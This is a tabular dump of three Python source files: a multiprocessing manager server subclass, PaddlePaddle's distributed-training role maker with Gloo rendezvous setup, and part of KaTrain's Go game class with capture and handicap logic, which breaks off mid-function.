source stringlengths 3 86 | python stringlengths 75 1.04M |
|---|---|
managers.py | # -*- coding: utf-8 -*-
from __future__ import absolute_import
import multiprocessing.managers
from multiprocessing.managers import SyncManager as _SyncManager
import threading
__author__ = 'yasu'
class ManagerServer(multiprocessing.managers.Server):
manager = multiprocessing.managers.SyncManager
@property
def socket(self):
return self.listener._listener._socket
def dispatch(self, sock):
'''
Run the server forever
'''
multiprocessing.managers.current_process()._manager_server = self
c = self.listener.accept()
t = threading.Thread(target=self.handle_request, args=(c, ))
t.daemon = True
t.start()
def server_close(self):
pass
def create(self, c, typeid, *args, **kwds):
'''
Create a new shared object and return its id
'''
self.mutex.acquire()
try:
ident = kwds.pop("ident", None)
if ident is not None:
ident = "%s_%s" % (typeid, ident)
callable, exposed, method_to_typeid, proxytype = \
self.registry[typeid]
if ident is None or ident not in self.id_to_obj:
if callable is None:
assert len(args) == 1 and not kwds
obj = args[0]
else:
obj = callable(*args, **kwds)
if not ident:
ident = '%x' % id(obj) # convert to string because xmlrpclib
else:
obj = self.id_to_obj[ident][0]
if exposed is None:
exposed = multiprocessing.managers.public_methods(obj)
if method_to_typeid is not None:
assert type(method_to_typeid) is dict
exposed = list(exposed) + list(method_to_typeid)
# only has 32 bit signed integers
multiprocessing.managers.util.debug('%r callable returned object with id %r', typeid, ident)
self.id_to_obj[ident] = (obj, set(exposed), method_to_typeid)
if ident not in self.id_to_refcount:
self.id_to_refcount[ident] = 0
# increment the reference count immediately, to avoid
# this object being garbage collected before a Proxy
# object for it can be created. The caller of create()
# is responsible for doing a decref once the Proxy object
# has been created.
self.incref(c, ident)
return ident, tuple(exposed)
finally:
self.mutex.release()
class SyncManager(_SyncManager):
_Server = ManagerServer
def get_server(self):
'''
Return server object with serve_forever() method and address attribute
'''
assert self._state.value == multiprocessing.managers.State.INITIAL
return self._Server(self._registry, self._address,
self._authkey, self._serializer)
|
role_maker.py | # Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Defination of Role Makers."""
import os
import time
import numpy as np
import warnings
from multiprocessing import Process, Manager
import paddle
import paddle.fluid as fluid
from paddle.distributed.fleet.base.private_helper_function import wait_server_ready
class Role:
WORKER = 1
SERVER = 2
HETER_WORKER = 3
ALL = 4
class Gloo(object):
"""
Gloo is a universal class for barrier and collective communication
"""
class RENDEZVOUS:
HDFS = 1
FILE = 2
HTTP = 3
def __init__(self):
self._worker_comm = None
self._server_comm = None
self._nodes_comm = None
self._comm_world = ["worker", "server", "all"]
self._err_init = "gloo is not initialized, will not communicator with other nodes"
self._err_type = "gloo initialized error, please check arguments"
self._err_world = "argument error, comm_world must in {}".format(
self._comm_world)
self._is_initialized = False
self._init_timeout_seconds = 3600
self._run_timeout_seconds = 9999999
self._rendezvous = None
self._role = None
self._iface = None
self._role_id = -1
self._worker_num = -1
self._server_num = -1
self._need_init_all = False
def init(self,
rendezvous,
role,
role_id,
worker_num,
server_num,
need_init_all=False,
kwargs=None):
self._rendezvous = rendezvous
self._role = role
self._role_id = role_id
self._worker_num = worker_num
self._server_num = server_num
self._need_init_all = need_init_all
self._iface = ""
self._prefix = kwargs.get("store.prefix", "")
http_server = None
if self._rendezvous == Gloo.RENDEZVOUS.HDFS:
dfs_name = kwargs.get("dfs.name", "")
dfs_ugi = kwargs.get("dfs.ugi", "")
dfs_path = kwargs.get("dfs.path", "")
if not dfs_name or not dfs_ugi or not dfs_path:
raise ValueError(self._err_type)
self._init_dfs(dfs_name, dfs_ugi, dfs_path, self._prefix)
elif self._rendezvous == Gloo.RENDEZVOUS.FILE:
fs_path = kwargs.get("dfs.path", "")
if not fs_path:
raise ValueError(self._err_type)
self._init_fs(fs_path, self._prefix)
elif self._rendezvous == Gloo.RENDEZVOUS.HTTP:
ip = kwargs.get("http.host", "")
port = kwargs.get("http.port", "")
start_http_server = kwargs.get("start_http_server", False)
http_server_d = kwargs.get("http_server_d")
if not ip or not port:
raise ValueError(self._err_type)
http_server = self._init_http(ip, port, self._prefix,
start_http_server, http_server_d)
else:
raise ValueError(self._err_type)
self._is_initialized = True
self._http_server = http_server
def _init_fs(self, fs_path, prefix):
def init(rank, nodes, role):
gloo = fluid.core.Gloo()
gloo.set_rank(rank)
gloo.set_size(nodes)
gloo.set_prefix(prefix)
gloo.set_iface(self._iface)
gloo.set_timeout_seconds(self._init_timeout_seconds,
self._run_timeout_seconds)
gloo.set_hdfs_store(os.path.join(fs_path, role), "", "")
gloo.init()
return gloo
if self._role == Role.WORKER:
rank, nodes = self._get_rank_nodes(Role.WORKER)
gloo = init(rank, nodes, "WORKER")
self._worker_comm = gloo
else:
rank, nodes = self._get_rank_nodes(Role.SERVER)
gloo = init(rank, nodes, "SERVER")
self._server_comm = gloo
if self._need_init_all:
rank, nodes = self._get_rank_nodes(Role.ALL)
gloo = init(rank, nodes, "ALL")
self._nodes_comm = gloo
def _init_dfs(self, dfs_name, dfs_ugi, dfs_path, prefix):
def init(rank, nodes, role):
gloo = fluid.core.Gloo()
gloo.set_rank(rank)
gloo.set_size(nodes)
gloo.set_prefix(prefix)
gloo.set_iface(self._iface)
gloo.set_timeout_seconds(self._init_timeout_seconds,
self._run_timeout_seconds)
gloo.set_hdfs_store(os.path.join(dfs_path, role), dfs_name, dfs_ugi)
gloo.init()
return gloo
if self._role == Role.WORKER:
rank, nodes = self._get_rank_nodes(Role.WORKER)
gloo = init(rank, nodes, "WORKER")
self._worker_comm = gloo
else:
rank, nodes = self._get_rank_nodes(Role.SERVER)
gloo = init(rank, nodes, "SERVER")
self._server_comm = gloo
if self._need_init_all:
rank, nodes = self._get_rank_nodes(Role.ALL)
gloo = init(rank, nodes, "ALL")
self._nodes_comm = gloo
def _init_http(self, ip, port, prefix, start_http_server, http_server_d):
def __start_kv_server(http_server_d, size_d):
from paddle.distributed.fleet.utils.http_server import KVServer
http_server = KVServer(port, size_d)
http_server.start()
wait_seconds = 5
while http_server_d.get("running", False):
time.sleep(wait_seconds)
http_server.stop()
def init_kv_server(http_server_d):
size_d = {
"trainer": self._worker_num,
"pserver": self._server_num,
"all": self._worker_num + self._server_num
}
http_server_d["running"] = True
# child process for http server
_http_server = Process(
target=__start_kv_server, args=(http_server_d, size_d))
_http_server.daemon = True
# set running status to True
# start child process
_http_server.start()
return _http_server
def init(rank, nodes, role):
gloo = fluid.core.Gloo()
gloo.set_rank(rank)
gloo.set_size(nodes)
gloo.set_prefix(prefix)
gloo.set_iface(self._iface)
gloo.set_timeout_seconds(self._init_timeout_seconds,
self._run_timeout_seconds)
gloo.set_http_store(ip, port, role)
ep = ":".join([ip, str(port)])
wait_server_ready([ep])
gloo.init()
return gloo
port = int(port)
if start_http_server:
http_server = init_kv_server(http_server_d)
if self._role == Role.WORKER:
rank, nodes = self._get_rank_nodes(Role.WORKER)
gloo = init(rank, nodes, "WORKER")
self._worker_comm = gloo
else:
rank, nodes = self._get_rank_nodes(Role.SERVER)
gloo = init(rank, nodes, "SERVER")
self._server_comm = gloo
if self._need_init_all:
rank, nodes = self._get_rank_nodes(Role.ALL)
gloo = init(rank, nodes, "ALL")
self._nodes_comm = gloo
if start_http_server:
http_server_d["running"] = False
http_server.join()
def _get_rank_nodes(self, role):
nodes = 0
rank = -1
if role == Role.WORKER:
nodes = self._worker_num
rank = self._role_id
elif role == Role.SERVER:
nodes = self._server_num
rank = self._role_id
elif role == Role.ALL:
nodes = self._worker_num + self._server_num
if self._role == Role.WORKER:
rank = self._role_id
else:
rank = self._worker_num + self._role_id
else:
ValueError(self._err_type)
return rank, nodes
def __get_default_iface(self):
"""
get default physical interface
"""
default1 = self.__get_default_iface_from_gateway()
default2 = self.__get_default_iface_from_interfaces()
return default2 if default1 == "lo" else default1
def __get_default_iface_from_gateway(self):
"""
get default physical interface
"""
res = os.popen("route -A inet").read().strip().split("\n")
gateway_idx = None
iface_idx = None
for item in res:
item = item.split()
if "Gateway" in item and "Iface" in item:
gateway_idx = item.index("Gateway")
iface_idx = item.index("Iface")
elif gateway_idx != None and iface_idx != None:
gateway = None
if len(item) > gateway_idx:
gateway = item[gateway_idx]
if gateway and gateway != '*' and gateway != "0.0.0.0" and len(
item) > iface_idx:
return item[iface_idx]
return "lo"
def __get_default_iface_from_interfaces(self):
"""
get default physical interface
"""
res = os.popen("ip -f inet addr | awk NR%3==1").read().strip().split(
"\n")
for item in res:
if "BROADCAST" in item:
return item.split(":")[1].strip()
return "lo"
def barrier(self, comm_world):
"""
dummy barrier, do nothing
"""
if not self._is_initialized:
warnings.warn(self._err_init)
return
if comm_world not in self._comm_world:
raise ValueError(self._err_world)
if comm_world == "worker":
self._worker_comm.barrier()
elif comm_world == "server":
self._server_comm.barrier()
else:
self._nodes_comm.barrier()
def all_reduce(self, input, mode="sum", comm_world="worker"):
if not self._is_initialized:
warnings.warn(self._err_init)
return input
if comm_world not in self._comm_world:
raise ValueError(self._err_world)
input = np.array(input)
input_shape = input.shape
input_list = input.reshape(-1).tolist()
self.barrier(comm_world)
if comm_world == "worker":
ans = self._worker_comm.all_reduce(input_list, mode)
elif comm_world == "server":
ans = self._server_comm.all_reduce(input_list, mode)
else:
ans = self._nodes_comm.all_reduce(input_list, mode)
output = np.array(ans).reshape(input_shape)
return output
def all_gather(self, input, comm_world="worker"):
"""
dummy all gather, do nothing
Args:
obj(any): obj to do all gather
"""
if not self._is_initialized:
warnings.warn(self._err_init)
return input
if comm_world not in self._comm_world:
raise ValueError(self._err_world)
if comm_world == "worker":
output = self._worker_comm.all_gather(input)
elif comm_world == "server":
output = self._server_comm.all_gather(input)
else:
output = self._nodes_comm.all_gather(input)
return output
class RoleMakerBase(object):
"""
RoleMakerBase is a base class for assigning a role to current process
in distributed training.
A paddle developer can implement RoleMakerBase to design a role maker
for worker or pserver assignment.
"""
def __init__(self):
self._worker_endpoints = []
self._server_endpoints = []
self._role_is_generated = False
self._role = None
self._current_id = -1
# for heter parameter server mode
self._heter_trainer_endpoints = []
self._heter_trainer_device = "CPU"
self._is_heter_parameter_server_mode = False
def _is_worker(self):
"""
return is_worker() of current process
"""
raise NotImplementedError("Please implement this method in child class")
def _is_server(self):
"""
return is_server() of current process
"""
raise NotImplementedError("Please implement this method in child class")
def _is_first_worker(self):
"""
Check whether the node is the first instance of worker.
Returns:
bool: True if this is the first node of worker,
False if not.
"""
raise NotImplementedError("Please implement this method in child class")
def _worker_num(self):
"""
Get current total worker number.
Returns:
int: worker number
"""
raise NotImplementedError("Please implement this method in child class")
def _server_num(self):
"""
Get current total server number.
Returns:
int: server number
"""
raise NotImplementedError("Please implement this method in child class")
def _worker_index(self):
"""
Get current worker id.
Returns:
int: node id
"""
raise NotImplementedError("Please implement this method in child class")
def _server_index(self):
"""
Get current server id.
Returns:
int: node id
"""
raise NotImplementedError("Please implement this method in child class")
def _role_id(self):
"""
Get current id.
Returns:
int: node id
"""
raise NotImplementedError("Please implement this method in child class")
def _node_num(self):
"""
Get the training node number
Returns:
int: node num
"""
raise NotImplementedError("Please implement this method in child class")
def _get_trainer_endpoints(self):
"""
return trainer endpoints
"""
return self._worker_endpoints
def _get_pserver_endpoints(self):
"""
return pserver endpoints
"""
return self._server_endpoints
def to_string(self):
return "role: {}, current_id: {}, worker_endpoints: {}, server_endpoints: {}".format(
self._role, self._current_id, self._worker_endpoints,
self._server_endpoints)
def _all_gather(self, input, comm_world="worker"):
print("warning: RoleMakerBase does not have all gather worker.")
return None
def _all_reduce(self, input, mode="sum", comm_world="worker"):
"""
Args:
input(list/numpy.array): array of one dim
output(list/numpy.array): array of one dim
mode(str): "sum" or "min" or "max"
"""
print("warning: RoleMakerBase does not have all reduce worker.")
return None
def _barrier(self, comm_world):
"""
barrier between trainers if current role is TRAINER
"""
print("warning: RoleMakerBase does not have barrier worker.")
def _is_heter_worker(self):
"""
Return is_heter_worker() of current process
"""
warnings.warn("RoleMakerBase does not have function: _is_heter_worker.")
return False
def _heter_worker_num(self):
"""
Get current total heter-worker number.
Returns:
int: heter_worker number
"""
warnings.warn(
"RoleMakerBase does not have function: _heter_worker_num.")
return 0
def _get_heter_worker_endpoints(self):
"""
Returns:
string: all heter_trainers'endpoints
"""
assert self._heter_trainer_endpoints != [], "Heter Worker Endpoints Not initialized"
return self._heter_trainer_endpoints
def _get_heter_worker_endpoint(self):
"""
Returns:
int: corresponding heter_trainer's endpoint
e.g: if we have 4 cpu-trainer(default), 2 gpu-trainer(heter)
then No.0 and No.2 cpu-trainer will work with No.0 gpu-trainer
and No.1 and No.3 cpu-trainer will work with No.1 gpu-trainer
"""
assert self._heter_trainer_endpoints != [], "Heter Worker Endpoints Not initialized"
return self._heter_trainer_endpoints[(self._current_id) %
self._heter_worker_num()]
class PaddleCloudRoleMaker(RoleMakerBase):
def __init__(self, is_collective=False, **kwargs):
super(PaddleCloudRoleMaker, self).__init__()
self._is_collective = is_collective
self._non_distributed = False
self._kwargs = kwargs
self._role_is_generated = False
self._server_endpoints = []
self._worker_endpoints = []
self._gloo = Gloo() # gloo instance
def _barrier(self, comm_world):
self._gloo.barrier(comm_world)
def _all_gather(self, input, comm_world="worker"):
return self._gloo.all_gather(input, comm_world)
def _all_reduce(self, input, mode="sum", comm_world="worker"):
return self._gloo.all_reduce(input, mode, comm_world)
def _is_worker(self):
"""
whether current process is worker
"""
if not self._role_is_generated:
self._generate_role()
return self._role == Role.WORKER
def _is_server(self):
"""
whether current process is server
"""
if not self._role_is_generated:
self._generate_role()
return self._role == Role.SERVER
def _is_first_worker(self):
"""
whether current process is worker of rank 0
"""
if not self._role_is_generated:
self._generate_role()
return self._role == Role.WORKER and self._current_id == 0
def _worker_index(self):
"""
get index of current worker
"""
if not self._role_is_generated:
self._generate_role()
return self._current_id
def _server_index(self):
"""
get index of current server
"""
if not self._role_is_generated:
self._generate_role()
return self._current_id
def _role_id(self):
"""
get index of current node
"""
if not self._role_is_generated:
self._generate_role()
return self._current_id
def _worker_num(self):
"""
retrun the current number of worker
"""
if not self._role_is_generated:
self._generate_role()
return self._trainers_num
def _server_num(self):
"""
return the current number of server
"""
if not self._role_is_generated:
self._generate_role()
return len(self._get_pserver_endpoints(
)) if self._get_pserver_endpoints() is not None else 0
def _node_num(self):
"""
return the training node number
"""
if not self._role_is_generated:
self._generate_role()
return self._nodes_num
def _get_trainer_endpoints(self):
"""
get endpoint of all trainers
"""
if not self._role_is_generated:
self._generate_role()
return self._worker_endpoints
def _get_pserver_endpoints(self):
"""
get endpoint of all pservers
"""
if not self._role_is_generated:
self._generate_role()
return self._server_endpoints
def _is_non_distributed(self):
"""
Return True if indispensable environment for fleetrun is not found
(use python-run to launch fleet-code directly)
"""
if not self._role_is_generated:
self._generate_role()
return self._non_distributed
def _heter_worker_num(self):
"""
get heter worker nums
"""
if not self._role_is_generated:
self._generate_role()
return self._heter_trainers_num
def _is_heter_worker(self):
"""
whether current process is heter worker
"""
if not self._role_is_generated:
self._generate_role()
return self._role == Role.HETER_WORKER
def _ps_env(self):
# Environment variable PADDLE_PSERVERS_IP_PORT_LIST must be set
# format: string(ip:port,ip:port), eg. 127.0.0.1:6001,127.0.0.1:6002
self._server_endpoints = os.getenv("PADDLE_PSERVERS_IP_PORT_LIST", None)
if self._server_endpoints is None:
# back to non_distributed execution.
self._server_endpoints = ""
self._trainers_num = 1
self._role = Role.WORKER
self._current_id = 0
self._nodes_num = 1
self._heter_trainers_num = 0
self._heter_trainer_endpoints = None
self._non_distributed = True
return
self._server_endpoints = self._server_endpoints.split(",")
self._worker_endpoints = os.getenv("PADDLE_TRAINER_ENDPOINTS", None)
if self._worker_endpoints != None:
self._worker_endpoints = self._worker_endpoints.split(",")
else:
self._worker_endpoints = []
trainers_num = os.getenv("PADDLE_TRAINERS_NUM", None)
if trainers_num == None:
raise ValueError(
"Can not find PADDLE_TRAINERS_NUM, please check your environment."
)
trainers_num = int(trainers_num)
training_role = os.getenv("TRAINING_ROLE", None)
if training_role == None:
raise ValueError(
"Can not find TRAINING_ROLE, please check your environment.")
if training_role not in ["TRAINER", "PSERVER", "HETER_TRAINER"]:
raise ValueError(
"TRAINING_ROLE must be PSERVER or TRAINER or HETER_TRAINER, but get {}, please check your environment.".
format(training_role))
# For heter parameter server env setting
heter_trainer_eplist = os.getenv("PADDLE_HETER_TRAINER_IP_PORT_LIST",
"")
if heter_trainer_eplist != "":
try:
heter_trainer_eplist = os.environ[
"PADDLE_HETER_TRAINER_IP_PORT_LIST"].split(",")
except:
raise ValueError(
"Can not Find PADDLE_HETER_TRAINER_IP_PORT_LIST in env or its format doesn't match the requirement: 'IP:PORT,IP:PORT' ."
)
self._is_heter_parameter_server_mode = True
heter_trainers_num = len(heter_trainer_eplist)
else:
self._is_heter_parameter_server_mode = False
heter_trainers_num = 0
if training_role == "TRAINER":
role = Role.WORKER
current_id = os.getenv("PADDLE_TRAINER_ID", None)
if current_id == None:
raise ValueError(
"Can not find PADDLE_TRAINER_ID, please check your environment."
)
current_id = int(current_id)
if len(self._worker_endpoints) > 0:
self._cur_endpoint = self._worker_endpoints[current_id]
elif training_role == "PSERVER":
role = Role.SERVER
port = os.getenv("PADDLE_PORT", None)
if port == None:
raise ValueError(
"Can not find PADDLE_PORT, please check your environment.")
ip = os.getenv("POD_IP", None)
if ip == None:
raise ValueError(
"Can not find POD_IP, please check your environment.")
self._cur_endpoint = ip + ":" + port
current_id = self._server_endpoints.index(self._cur_endpoint)
elif training_role == "HETER_TRAINER":
role = Role.HETER_WORKER
cur_port = os.getenv("PADDLE_PORT", None)
if cur_port == None:
raise ValueError(
"Can not find PADDLE_PORT, please check your environment.")
cur_ip = os.getenv("POD_IP", None)
if cur_ip == None:
raise ValueError(
"Can not find POD_IP, please check your environment.")
curr_endpoint = ":".join([cur_ip, cur_port])
current_id = heter_trainer_eplist.index(curr_endpoint)
self._trainers_num = trainers_num
self._role = role
self._current_id = current_id
self._nodes_num = len(
set([x.split(':')[0] for x in self._worker_endpoints]))
self._heter_trainers_num = heter_trainers_num
self._heter_trainer_endpoints = heter_trainer_eplist
def _collective_env(self):
self._current_id = int(os.getenv("PADDLE_TRAINER_ID", "0"))
self._training_role = os.getenv("PADDLE_TRAINING_ROLE", "TRAINER")
assert (self._training_role == "TRAINER")
self._role = Role.WORKER
self._worker_endpoints = os.getenv("PADDLE_TRAINER_ENDPOINTS")
self._cur_endpoint = os.getenv("PADDLE_CURRENT_ENDPOINT")
if self._worker_endpoints is None:
# back to non_distributed execution.
self._worker_endpoints = "127.0.0.1:6170"
self._cur_endpoint = self._worker_endpoints
self._non_distributed = True
self._worker_endpoints = self._worker_endpoints.split(",")
self._trainers_num = len(self._worker_endpoints)
self._nodes_num = len(
set([x.split(':')[0] for x in self._worker_endpoints]))
def _gloo_init(self):
# PADDLE_WITH_GLOO 1: trainer barrier, 2: all barrier
use_gloo = int(os.getenv("PADDLE_WITH_GLOO", "0"))
if use_gloo not in [1, 2]:
return
# PADDLE_GLOO_RENDEZVOUS 1: HDFS 2: FILE 3: HTTP
rendezvous_type = int(os.getenv("PADDLE_GLOO_RENDEZVOUS", "0"))
prefix = os.getenv("SYS_JOB_ID", "")
if rendezvous_type not in [
Gloo.RENDEZVOUS.HDFS, Gloo.RENDEZVOUS.HTTP, Gloo.RENDEZVOUS.FILE
]:
raise ValueError(self._gloo._err_type)
need_init_all = True if use_gloo == 2 else False
if rendezvous_type == Gloo.RENDEZVOUS.HDFS:
dfs_name = os.getenv("PADDLE_GLOO_FS_NAME", "")
dfs_ugi = os.getenv("PADDLE_GLOO_FS_UGI", "")
dfs_path = os.getenv("PADDLE_GLOO_FS_PATH", "")
kwargs = {
"dfs.name": dfs_name,
"dfs.ugi": dfs_ugi,
"dfs.path": dfs_path,
"store.prefix": prefix,
}
elif rendezvous_type == Gloo.RENDEZVOUS.HTTP:
start_http_server = False
manager = Manager()
http_server_d = manager.dict()
http_server_d["running"] = False
if self._is_collective:
ep_rank_0 = self._worker_endpoints[0]
if self._is_first_worker():
start_http_server = True
else:
ep_rank_0 = os.getenv("PADDLE_GLOO_HTTP_ENDPOINT", "")
if self._server_index() == 0:
start_http_server = True
ip, port = ep_rank_0.split(':')
kwargs = {
"http.host": ip,
"http.port": port,
"store.prefix": prefix,
'start_http_server': start_http_server,
'http_server_d': http_server_d,
}
else:
dfs_path = os.getenv("PADDLE_GLOO_FS_PATH", "")
kwargs = {
"dfs.path": dfs_path,
"store.prefix": prefix,
}
if rendezvous_type == Gloo.RENDEZVOUS.HDFS:
type = "HDFS"
elif rendezvous_type == Gloo.RENDEZVOUS.HTTP:
type = "HTTP"
else:
type = "FILE"
print("Gloo init with {}: need_init_all: {}, args: {}".format(
type, need_init_all, kwargs))
self._gloo.init(
rendezvous=rendezvous_type,
role=self._role,
role_id=self._role_id(),
worker_num=self._worker_num(),
server_num=self._server_num(),
need_init_all=need_init_all,
kwargs=kwargs)
if rendezvous_type == Gloo.RENDEZVOUS.HTTP:
http_server_d['running'] = False
def _generate_role(self):
"""
generate role for role maker
"""
if not self._role_is_generated:
if not self._is_collective:
self._ps_env()
else:
self._collective_env()
self._role_is_generated = True
if not paddle.fluid.framework.in_dygraph_mode():
self._gloo_init()
class UserDefinedRoleMaker(PaddleCloudRoleMaker):
def __init__(self, is_collective=False, init_gloo=False, **kwargs):
super(UserDefinedRoleMaker, self).__init__(
is_collective=is_collective, init_gloo=init_gloo, **kwargs)
self._init_gloo = init_gloo
def _user_defined_ps_env(self):
self._server_endpoints = self._kwargs.get("server_endpoints")
self._worker_endpoints = self._kwargs.get("worker_endpoints", [])
self._trainers_num = self._kwargs.get("worker_num", 0)
if self._trainers_num == 0:
assert (len(self._worker_endpoints) > 0)
self._trainers_num = len(self._worker_endpoints)
self._role = self._kwargs.get("role")
self._current_id = self._kwargs.get("current_id")
if self._role == Role.WORKER and len(
self._worker_endpoints) > self._current_id:
self._cur_endpoint = self._worker_endpoints[self._current_id]
elif self._role == Role.SERVER:
self._cur_endpoint = self._server_endpoints[self._current_id]
self._nodes_num = len(
set([x.split(':')[0] for x in self._worker_endpoints]))
def _user_defined_collective_env(self):
self._worker_endpoints = self._kwargs.get("worker_endpoints")
self._current_id = self._kwargs.get("current_id")
self._trainers_num = len(self._worker_endpoints)
self._training_role = Role.WORKER
self._nodes_num = len(
set([x.split(':')[0] for x in self._worker_endpoints]))
def _generate_role(self):
"""
generate role for role maker
"""
if not self._role_is_generated:
if not self._is_collective:
self._user_defined_ps_env()
else:
self._user_defined_collective_env()
self._role_is_generated = True
|
game.py | import math
import os
import re
import threading
from datetime import datetime
from typing import Dict, List, Optional, Union
from katrain.core.constants import HOMEPAGE, OUTPUT_DEBUG, OUTPUT_INFO
from katrain.core.engine import KataGoEngine
from katrain.core.game_node import GameNode
from katrain.core.lang import i18n
from katrain.core.sgf_parser import SGF, Move
from katrain.core.utils import var_to_grid
class IllegalMoveException(Exception):
pass
class KaTrainSGF(SGF):
_NODE_CLASS = GameNode
class Game:
"""Represents a game of go, including an implementation of capture rules."""
DEFAULT_PROPERTIES = {"GM": 1, "FF": 4, "AP": f"KaTrain:{HOMEPAGE}", "CA": "UTF-8"}
def __init__(
self,
katrain,
engine: Union[Dict, KataGoEngine],
move_tree: GameNode = None,
analyze_fast=False,
game_properties: Optional[Dict] = None,
):
self.katrain = katrain
if not isinstance(engine, Dict):
engine = {"B": engine, "W": engine}
self.engines = engine
self.game_id = datetime.strftime(datetime.now(), "%Y-%m-%d %H %M %S")
if move_tree:
self.root = move_tree
self.komi = self.root.komi
handicap = int(self.root.get_property("HA", 0))
if handicap and not self.root.placements:
self.place_handicap_stones(handicap)
else:
board_size = katrain.config("game/size")
self.komi = katrain.config("game/komi")
self.root = GameNode(
properties={
**Game.DEFAULT_PROPERTIES,
**{"SZ": board_size, "KM": self.komi, "DT": self.game_id},
**(game_properties or {}),
}
)
handicap = katrain.config("game/handicap")
if handicap:
self.place_handicap_stones(handicap)
if not self.root.get_property("RU"):
self.root.set_property("RU", katrain.config("game/rules"))
self.set_current_node(self.root)
threading.Thread(
target=lambda: self.analyze_all_nodes(-1_000_000, analyze_fast=analyze_fast), daemon=True
).start() # return faster, but bypass Kivy Clock
def analyze_all_nodes(self, priority=0, analyze_fast=False):
for node in self.root.nodes_in_tree:
node.analyze(self.engines[node.next_player], priority=priority, analyze_fast=analyze_fast)
# -- move tree functions --
def _calculate_groups(self):
board_size_x, board_size_y = self.board_size
self.board = [
[-1 for _x in range(board_size_x)] for _y in range(board_size_y)
] # type: List[List[int]] # board pos -> chain id
self.chains = [] # type: List[List[Move]] # chain id -> chain
self.prisoners = [] # type: List[Move]
self.last_capture = [] # type: List[Move]
try:
# for m in self.moves:
for node in self.current_node.nodes_from_root:
for m in node.move_with_placements:
self._validate_move_and_update_chains(m, True) # ignore ko since we didn't know if it was forced
except IllegalMoveException as e:
raise Exception(f"Unexpected illegal move ({str(e)})")
def _validate_move_and_update_chains(self, move: Move, ignore_ko: bool):
board_size_x, board_size_y = self.board_size
def neighbours(moves):
return {
self.board[m.coords[1] + dy][m.coords[0] + dx]
for m in moves
for dy, dx in [(-1, 0), (1, 0), (0, -1), (0, 1)]
if 0 <= m.coords[0] + dx < board_size_x and 0 <= m.coords[1] + dy < board_size_y
}
ko_or_snapback = len(self.last_capture) == 1 and self.last_capture[0] == move
self.last_capture = []
if move.is_pass:
return
if self.board[move.coords[1]][move.coords[0]] != -1:
raise IllegalMoveException("Space occupied")
nb_chains = list({c for c in neighbours([move]) if c >= 0 and self.chains[c][0].player == move.player})
if nb_chains:
this_chain = nb_chains[0]
self.board = [
[nb_chains[0] if sq in nb_chains else sq for sq in line] for line in self.board
] # merge chains connected by this move
for oc in nb_chains[1:]:
self.chains[nb_chains[0]] += self.chains[oc]
self.chains[oc] = []
self.chains[nb_chains[0]].append(move)
else:
this_chain = len(self.chains)
self.chains.append([move])
self.board[move.coords[1]][move.coords[0]] = this_chain
opp_nb_chains = {c for c in neighbours([move]) if c >= 0 and self.chains[c][0].player != move.player}
for c in opp_nb_chains:
if -1 not in neighbours(self.chains[c]):
self.last_capture += self.chains[c]
for om in self.chains[c]:
self.board[om.coords[1]][om.coords[0]] = -1
self.chains[c] = []
if ko_or_snapback and len(self.last_capture) == 1 and not ignore_ko:
raise IllegalMoveException("Ko")
self.prisoners += self.last_capture
if -1 not in neighbours(self.chains[this_chain]): # TODO: NZ rules?
raise IllegalMoveException("Suicide")
# Play a Move from the current position, raise IllegalMoveException if invalid.
def play(self, move: Move, ignore_ko: bool = False, analyze=True):
board_size_x, board_size_y = self.board_size
if not move.is_pass and not (0 <= move.coords[0] < board_size_x and 0 <= move.coords[1] < board_size_y):
raise IllegalMoveException(f"Move {move} outside of board coordinates")
try:
self._validate_move_and_update_chains(move, ignore_ko)
except IllegalMoveException:
self._calculate_groups()
raise
played_node = self.current_node.play(move)
self.current_node = played_node
if analyze:
played_node.analyze(self.engines[played_node.next_player])
return played_node
def set_current_node(self, node):
self.current_node = node
self._calculate_groups()
def undo(self, n_times=1):
cn = self.current_node # avoid race conditions
for _ in range(n_times):
if not cn.is_root:
cn.parent.set_favourite_child(cn)
cn = cn.parent
self.set_current_node(cn)
def redo(self, n_times=1):
cn = self.current_node # avoid race conditions
for _ in range(n_times):
if cn.children:
cn = cn.favourite_child
self.set_current_node(cn)
def switch_branch(self, direction):
cn = self.current_node # avoid race conditions
if cn.parent and len(cn.parent.children) > 1:
ix = cn.parent.children.index(cn)
self.set_current_node(cn.parent.children[(ix + direction) % len(cn.parent.children)])
def place_handicap_stones(self, n_handicaps):
board_size_x, board_size_y = self.board_size
near_x = 3 if board_size_x >= 13 else min(2, board_size_x - 1)
near_y = 3 if board_size_y >= 13 else min(2, board_size_y - 1)
far_x = board_size_x - 1 - near_x
far_y = board_size_y - 1 - near_y
middle_x = board_size_x // 2 # what for even sizes?
middle_y = board_size_y // 2
if n_handicaps > 9 and board_size_x == board_size_y:
stones_per_row = math.ceil(math.sqrt(n_handicaps))
spacing = (far_x - near_x) / (stones_per_row - 1)
if spacing < near_x:
far_x += 1
near_x -= 1
spacing = (far_x - near_x) / (stones_per_row - 1)
coords = list({math.floor(0.5 + near_x + i * spacing) for i in range(stones_per_row)})
stones = sorted(
[(x, y) for x in coords for y in coords],
key=lambda xy: -((xy[0] - (board_size_x - 1) / 2) ** 2 + (xy[1] - (board_size_y - 1) / 2) ** 2),
)
else: # max 9
stones = [(far_x, far_y), (near_x, near_y), (far_x, near_y), (near_x, far_y)]
if n_handicaps % 2 == 1:
stones.append((middle_x, middle_y))
stones += [(near_x, middle_y), (far_x, middle_y), (middle_x, near_y), (middle_x, far_y)]
self.root.set_property(
"AB", list({Move(stone).sgf(board_size=(board_size_x, board_size_y)) for stone in stones[:n_handicaps]})
)
@property
def board_size(self):
return self.root.board_size
@property
def stones(self):
return sum(self.chains, [])
@property
def ended(self):
return self.current_node.parent and self.current_node.is_pass and self.current_node.parent.is_pass
@property
def prisoner_count(
self,
) -> Dict: # returns prisoners that are of a certain colour as {B: black stones captures, W: white stones captures}
return {player: sum([m.player == player for m in self.prisoners]) for player in Move.PLAYERS}
@property
def manual_score(self):
rules = self.engines["B"].get_rules(self.root)
if not self.current_node.ownership or rules != "japanese":
if not self.current_node.score:
return None
self.katrain.log(
f"rules '{rules}' are not japanese, or no ownership available ({not self.current_node.ownership}) -> no manual score available",
OUTPUT_DEBUG,
)
